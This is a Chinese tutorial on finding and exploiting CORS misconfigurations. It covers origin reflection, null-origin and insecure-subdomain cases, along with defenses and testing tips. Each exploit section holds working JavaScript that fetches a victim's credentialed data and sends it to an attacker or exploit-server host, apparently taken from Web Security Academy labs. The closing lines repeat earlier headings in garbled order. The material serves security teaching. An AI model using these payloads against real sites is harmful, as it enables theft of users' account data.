CORS漏洞挖掘与利用教学文档<\/h1>

1. CORS漏洞基础<\/h2>

1.1 CORS概述<\/h3>
跨源资源共享(CORS)是一种机制，允许网页从不同域请求受限资源。当服务器配置不当时，可能导致敏感数据泄露。<\/p>

1.2 漏洞检测方法<\/h3>

最常见的测试方法是在请求中添加Origin标头：<\/p>

GET<\/span> \/sensitive-victim-data HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> vulnerable-website.com<\/span>
<\/span><\/span>Origin:<\/span> https:\/\/malicious-website.com<\/span>
<\/span><\/span>Cookie:<\/span> sessionid=...<\/span>
<\/span><\/span><\/code><\/pre>如果服务器响应中包含：<\/p>
HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK<\/span>
<\/span><\/span>Access-Control-Allow-Origin:<\/span> https:\/\/malicious-website.com<\/span>
<\/span><\/span>Access-Control-Allow-Credentials:<\/span> true<\/span>
<\/span><\/span>...<\/span>
<\/span><\/span><\/code><\/pre>则表明存在CORS漏洞。<\/p>
2. CORS漏洞类型与利用<\/h2>
2.1 基本Origin反射漏洞<\/h3>
当服务器不加限制地反射请求中的Origin头时，攻击者可构造恶意网站窃取用户数据。<\/p>
利用代码示例<\/strong>：<\/p>
var<\/span> req<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>req<\/span>.onload<\/span> =<\/span> reqListener<\/span>;
<\/span><\/span>req<\/span>.open<\/span>('get'<\/span>,'https:\/\/vulnerable-website.com\/sensitive-victim-data'<\/span>,true<\/span>);
<\/span><\/span>req<\/span>.withCredentials<\/span> =<\/span> true<\/span>;
<\/span><\/span>req<\/span>.send<\/span>();
<\/span><\/span>
<\/span><\/span>function<\/span> reqListener<\/span>() {
<\/span><\/span>    location<\/span>=<\/span>'\/\/malicious-website.com\/log?key='<\/span>+<\/span>this<\/span>.responseText<\/span>;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>2.2 可信空源漏洞<\/h3>
某些服务器允许null<\/code>作为可信来源。<\/p>
利用方法<\/strong>：<\/p>

尝试使用null<\/code>作为Origin<\/li>
结合iframe sandbox生成null origin请求<\/li>
<\/ol>
利用代码示例<\/strong>：<\/p>
<iframe<\/span> sandbox<\/span>=<\/span>"allow-scripts allow-top-navigation allow-forms"<\/span> srcdoc<\/span>=<\/span>"
<\/span><\/span><\/span><script>
<\/span><\/span><\/span>    var req = new XMLHttpRequest();
<\/span><\/span><\/span>    req.onload = reqListener;
<\/span><\/span><\/span>    req.open('get','YOUR-LAB-ID.web-security-academy.net\/accountDetails',true);
<\/span><\/span><\/span>    req.withCredentials = true;
<\/span><\/span><\/span>    req.send();
<\/span><\/span><\/span>    function reqListener() {
<\/span><\/span><\/span>        location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net\/log?key='+encodeURIComponent(this.responseText);
<\/span><\/span><\/span>    };
<\/span><\/span><\/span><\/script>"<\/span>>
<\/span><\/span><\/iframe<\/span>>
<\/span><\/span><\/code><\/pre>2.3 受信任的不安全协议漏洞<\/h3>
当服务器信任来自子域的不安全协议(如HTTP)时。<\/p>
利用方法<\/strong>：<\/p>

寻找允许的子域名<\/li>
通过该子域发起跨域请求<\/li>
<\/ol>
利用代码示例<\/strong>：<\/p>
<script<\/span>>
<\/span><\/span>document.location<\/span>=<\/span>"http:\/\/stock.0a6500ef0389b5e4812a5c2e00c1001b.web-security-academy.net\/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https:\/\/0a6500ef0389b5e4812a5c2e00c1001b.web-security-academy.net\/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https:\/\/exploit-0ad90010039ab5dc81185be9017500f3.exploit-server.net\/log?key='%2bthis.responseText; };%3c\/script>&storeId=1"<\/span>
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>3. 漏洞挖掘流程<\/h2>

识别端点<\/strong>：寻找返回敏感数据的API端点<\/li>
测试Origin反射<\/strong>：添加任意Origin头测试反射<\/li>
测试null Origin<\/strong>：尝试使用null作为Origin<\/li>
测试子域名<\/strong>：检查是否信任子域名<\/li>
验证凭证<\/strong>：检查Access-Control-Allow-Credentials是否为true<\/li>
<\/ol>
4. 防御措施<\/h2>

严格限制允许的Origin<\/strong>：明确指定允许的域名，避免使用通配符<\/li>
避免反射Origin<\/strong>：不直接反射请求中的Origin头<\/li>
限制凭证<\/strong>：除非必要，否则不设置Access-Control-Allow-Credentials为true<\/li>
使用安全协议<\/strong>：确保所有跨域请求使用HTTPS<\/li>
验证请求来源<\/strong>：服务器端应验证请求的实际来源<\/li>
<\/ol>
5. 实战技巧<\/h2>

在Burp Suite中可以使用"Add Custom Header"选项快速测试Origin反射<\/li>
使用浏览器开发者工具查看CORS相关响应头<\/li>
注意检查AJAX请求中的withCredentials属性设置<\/li>
结合XSS等其他漏洞可增强CORS攻击效果<\/li>
<\/ol>
通过以上方法，安全研究人员可以有效地发现和利用CORS配置不当导致的安全漏洞。<\/p>

CORS漏洞挖掘与利用教学文档<\/h1>

1. CORS漏洞基础<\/h2>

1.1 CORS概述<\/h3> 跨源资源共享(CORS)是一种机制，允许网页从不同域请求受限资源。当服务器配置不当时，可能导致敏感数据泄露。<\/p>

2. CORS漏洞类型与利用<\/h2>

1.1 CORS概述<\/h3>
跨源资源共享(CORS)是一种机制，允许网页从不同域请求受限资源。当服务器配置不当时，可能导致敏感数据泄露。<\/p>